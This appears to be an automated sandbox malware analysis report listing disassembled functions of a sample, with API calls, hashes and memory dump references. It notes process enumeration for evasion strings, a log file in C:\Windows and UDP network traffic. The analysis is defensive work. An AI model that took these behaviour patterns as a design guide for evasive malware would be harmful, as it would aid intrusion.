                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 01290E46
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 01290E50
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 01290E5A
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 01290E64
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Global$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 675253578-0
                                                                                                                                                                                                                                    • Opcode ID: c02ccb74ec99ef5aa97c78a9a48201ecb6a154dafa7c4b9415aa7d785691dac7
                                                                                                                                                                                                                                    • Instruction ID: ffa130ee334d256cfcaf0bf4b115a6b7daa97554abe6bf282f8782e206650e4b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c02ccb74ec99ef5aa97c78a9a48201ecb6a154dafa7c4b9415aa7d785691dac7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68410A75E10209FBEB20DFE4D849FAEBB79AB48701F108548F615A72C4D7B46A508B94
                                                                                                                                                                                                                                    Function 01289C4F Relevance: 15.1, APIs: 10, Instructions: 147sleepprocessCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01289C94
                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 01289CDD
                                                                                                                                                                                                                                    • CharUpperA.USER32(?,00000002,00000000), ref: 01289CF1
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000400), ref: 01289D67
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000400), ref: 01289DB2
                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 01289DC6
                                                                                                                                                                                                                                    • CharUpperA.USER32(?,00000002,00000000), ref: 01289DDA
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000400), ref: 01289E25
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000400), ref: 01289E9D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 01289EB3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Sleep$CharProcess32Upper$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3272108884-0
                                                                                                                                                                                                                                    • Opcode ID: 36716044aadfb34d9312ca360a788a0c0091e2ec45330869a18ece28ad5bfe93
                                                                                                                                                                                                                                    • Instruction ID: 565c9d3827d31923f2fd14e3c874943276cab8e3e3dc9d02c7b6d1965596ec95
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36716044aadfb34d9312ca360a788a0c0091e2ec45330869a18ece28ad5bfe93
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E519CB19121198BEF24FB24DC49BFAB7B4AB95308F0481D9D609A7280D775ABD0CF91
                                                                                                                                                                                                                                    Function 01292B8E Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 174stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 012844CB: InterlockedExchange.KERNEL32(012990C0,0128A192), ref: 012844E9
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,01282490), ref: 01292C53
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 01292D24
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283DFC), ref: 01292D86
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283E00), ref: 01292D98
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283E04), ref: 01292DC1
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,%s,01293658,?,?,?,?,?,?), ref: 01292DD7
                                                                                                                                                                                                                                      • Part of subcall function 01292A35: lstrlen.KERNEL32(00000000), ref: 01292A4E
                                                                                                                                                                                                                                      • Part of subcall function 01292A35: lstrcat.KERNEL32(00000000,01283DE0), ref: 01292A7C
                                                                                                                                                                                                                                      • Part of subcall function 01292A35: lstrcat.KERNEL32(00000000,01283DE4), ref: 01292AA2
                                                                                                                                                                                                                                      • Part of subcall function 01292A35: lstrcat.KERNEL32(00000000,01283DE8), ref: 01292AB1
                                                                                                                                                                                                                                      • Part of subcall function 01292A35: lstrlen.KERNEL32(00000000), ref: 01292B0C
                                                                                                                                                                                                                                      • Part of subcall function 01292A35: lstrcat.KERNEL32(00000000,01283DEC), ref: 01292B40
                                                                                                                                                                                                                                      • Part of subcall function 01292A35: lstrcat.KERNEL32(00000000,01283DF0), ref: 01292B66
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcat$lstrlen$ExchangeInterlockedlstrcpy
                                                                                                                                                                                                                                    • String ID: %s
                                                                                                                                                                                                                                    • API String ID: 3361872186-3043279178
                                                                                                                                                                                                                                    • Opcode ID: e4d933abe980d7cd3b2abc05129fae78ab57546ec1c20db2411753673a0ae98c
                                                                                                                                                                                                                                    • Instruction ID: 8dd94349cb791324bdb2fc94b0c49316201b56e760ef5427ac372724de642d9b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4d933abe980d7cd3b2abc05129fae78ab57546ec1c20db2411753673a0ae98c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7061B5B6910159EBDF24EF68E8857ED77B5EF9C300F1081A8D609D32C4D7389A558FA0
                                                                                                                                                                                                                                    Function 012854A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76filestringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(C:\Windows\mqiwauwsp.log,40000000,00000002,00000000,00000004,00000080,00000000,?), ref: 01285507
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,C:\Windows\mqiwauwsp.log), ref: 0128553A
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000000), ref: 0128554E
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,01286958,00000000,?,00000000), ref: 01285599
                                                                                                                                                                                                                                    • SetEndOfFile.KERNEL32(000000FF), ref: 012855A6
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 012855B3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleWritelstrcpylstrlen
                                                                                                                                                                                                                                    • String ID: C:\Windows\mqiwauwsp.log
                                                                                                                                                                                                                                    • API String ID: 3630773104-564371081
                                                                                                                                                                                                                                    • Opcode ID: d2edc02996c1977d4d6438b3ade4c8c87f0c703461184ce084500837129a1231
                                                                                                                                                                                                                                    • Instruction ID: 1d25f1f3bcf8ab6ed369bba75209bd790b13871800f6f5ee86fe8cf2a8ed50a8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2edc02996c1977d4d6438b3ade4c8c87f0c703461184ce084500837129a1231
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 513196B5900318ABDB20DB54DC4DFDAB778AB98700F0086D8E219A72D1DBB46AD4CF90
                                                                                                                                                                                                                                    Function 01289B56 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66processCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,?,?), ref: 01289BA2
                                                                                                                                                                                                                                    • Module32First.KERNEL32(?,00000224), ref: 01289BC5
                                                                                                                                                                                                                                    • CharUpperA.USER32(?,00000008,?,?), ref: 01289BDE
                                                                                                                                                                                                                                    • Module32Next.KERNEL32(?,00000224), ref: 01289C2E
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000008,?,?), ref: 01289C3E
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Module32$CharCloseCreateFirstHandleNextSnapshotToolhelp32Upper
                                                                                                                                                                                                                                    • String ID: DWEBIO$DWEBLLIO
                                                                                                                                                                                                                                    • API String ID: 3788218250-3981995823
                                                                                                                                                                                                                                    • Opcode ID: f307851de9abb654a8087ea454fccd6387bfa1d0abd05c8e031b250000012842
                                                                                                                                                                                                                                    • Instruction ID: 7e9b22b7c94502aff41996e36f7baf92fdf08ce858bb278c84c8ab8e77ef6446
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f307851de9abb654a8087ea454fccd6387bfa1d0abd05c8e031b250000012842
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60216671911219ABDF20FBA8ED58BEAB7F8AF5C304F4045D9D608A2180DB75EAC4CF51
                                                                                                                                                                                                                                    Function 0128777D Relevance: 12.2, APIs: 8, Instructions: 237networkthreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 0128785A
                                                                                                                                                                                                                                      • Part of subcall function 0128719B: socket.WS2_32(00000002,00000002,00000011), ref: 01287203
                                                                                                                                                                                                                                      • Part of subcall function 0128719B: sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 0128726D
                                                                                                                                                                                                                                      • Part of subcall function 0128719B: select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 01287345
                                                                                                                                                                                                                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 012878CA
                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 012878E2
                                                                                                                                                                                                                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 01287940
                                                                                                                                                                                                                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 012879DC
                                                                                                                                                                                                                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 01287A19
                                                                                                                                                                                                                                      • Part of subcall function 01286330: RtlEnterCriticalSection.NTDLL(01299050), ref: 012863CD
                                                                                                                                                                                                                                      • Part of subcall function 01286330: RtlLeaveCriticalSection.NTDLL(01299050), ref: 01286960
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 01287A23
                                                                                                                                                                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 01287A2B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: sendto$CriticalSectionhtons$EnterExitFreeGlobalLeaveThreadUserselectsocket
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4130859867-0
                                                                                                                                                                                                                                    • Opcode ID: 4749790e580a96e71eb856f1123dc8bfb8cb379f409ce3a1df357e5920d75eb3
                                                                                                                                                                                                                                    • Instruction ID: d4e4bf6a803e7e967d55857113780c47e0fc364655b4aa10ceaaa7ac3fc36e95
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4749790e580a96e71eb856f1123dc8bfb8cb379f409ce3a1df357e5920d75eb3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A918171E10205BBEB14EBA8C895FEEF7B5EF48700F248598E615AB2C1D7759A40CB50
                                                                                                                                                                                                                                    Function 01292C88 Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 95stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 012844CB: InterlockedExchange.KERNEL32(012990C0,0128A192), ref: 012844E9
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 01292D24
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283DFC), ref: 01292D86
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283E00), ref: 01292D98
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283E04), ref: 01292DC1
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,%s,01293658,?,?,?,?,?,?), ref: 01292DD7
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01292DE5
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 01292DF9
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcat$ExchangeInterlockedlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                    • String ID: %s
                                                                                                                                                                                                                                    • API String ID: 3923932729-3043279178
                                                                                                                                                                                                                                    • Opcode ID: 164b8d7ee2244dc15951fa25434d196b472e9bdd5be09211273dc8aa4271d9bc
                                                                                                                                                                                                                                    • Instruction ID: 57e4dedf56f5c6615b71806b90273f4538e16336b33de7f7d32cc5d9988e134a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 164b8d7ee2244dc15951fa25434d196b472e9bdd5be09211273dc8aa4271d9bc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C31C476A20119EBDF24EF68ED45BF93375AF9C700F1085A8E609D21C4D634DA95CFA0
                                                                                                                                                                                                                                    Function 0128A677 Relevance: 12.1, APIs: 8, Instructions: 74stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0128A6E6
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,012826B8,00000000), ref: 0128A6F8
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0128A704
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0128A6C5
                                                                                                                                                                                                                                      • Part of subcall function 012844CB: InterlockedExchange.KERNEL32(012990C0,0128A192), ref: 012844E9
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0128A70F
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0128A730
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,012826B0,00000000), ref: 0128A742
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0128A74E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CountTick$lstrlenwsprintf$ExchangeInterlocked
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2702386088-0
                                                                                                                                                                                                                                    • Opcode ID: 8e2211b9f323ac01be9ebfa3f98d6601633bca2a03d6a7cbf70eb85ce92ab24b
                                                                                                                                                                                                                                    • Instruction ID: 6ce7f0031bb061c1f59b1be5d44e7955d4c0f9879ab8605bf9b3edf87e01f7a6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e2211b9f323ac01be9ebfa3f98d6601633bca2a03d6a7cbf70eb85ce92ab24b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A421D876611101ABD728BB78EC0DEBA37A8EF88241B048465FE09C32D4DA35E92087E0
                                                                                                                                                                                                                                    Function 0128A75A Relevance: 12.1, APIs: 8, Instructions: 72stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000080,00000000,?), ref: 0128A78C
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 0128A796
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,01283CC0), ref: 0128A7B2
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0128A7CF
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,01282880,00000000), ref: 0128A7FD
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0128A809
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,0128288C,00000000), ref: 0128A826
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0128A832
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$wsprintf$PathTemplstrcatlstrcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2776683041-0
                                                                                                                                                                                                                                    • Opcode ID: 2aa94f530e5ac3b78af8561fda192e4e655fa84c350776df072250e90d9e79a8
                                                                                                                                                                                                                                    • Instruction ID: b60e7e94303da90f010a5174acf6a8e317e7dc7e907376b8a05f8859dcbffaf1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2aa94f530e5ac3b78af8561fda192e4e655fa84c350776df072250e90d9e79a8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7021D0B5610104EFD714DB68E889BEA7779AFD4700F00C155FB09872D4DA74E994CBA0
                                                                                                                                                                                                                                    Function 01286EBE Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 168networkCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 01286F1C
                                                                                                                                                                                                                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 01286F7A
                                                                                                                                                                                                                                    • select.WS2_32(?,00000000,00000000,00000000,00000014), ref: 01287052
                                                                                                                                                                                                                                    • recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 01287081
                                                                                                                                                                                                                                    • closesocket.WS2_32(?), ref: 01287185
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: closesocketrecvfromselectsendtosocket
                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                    • API String ID: 4198204009-2766056989
                                                                                                                                                                                                                                    • Opcode ID: fe17ceb3f1111fdb2338e8cf19b8d7a07a972ea9477b0c0ddf6ad278b8a22cb2
                                                                                                                                                                                                                                    • Instruction ID: b57052ca9e9f8137ec4362c24c255bb76afd32e08dee005cbf799323e65dae69
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe17ceb3f1111fdb2338e8cf19b8d7a07a972ea9477b0c0ddf6ad278b8a22cb2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C71AA71D252699BEB38DB28CC55BE9B775BB48340F6041E9E39DA61C4CBB06EC48F40
                                                                                                                                                                                                                                    Function 01287523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141networkCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 01287580
                                                                                                                                                                                                                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 012875D1
                                                                                                                                                                                                                                    • select.WS2_32(?,00000000,00000000,00000000,0000001E), ref: 012876A9
                                                                                                                                                                                                                                    • recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 012876D8
                                                                                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 01287768
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
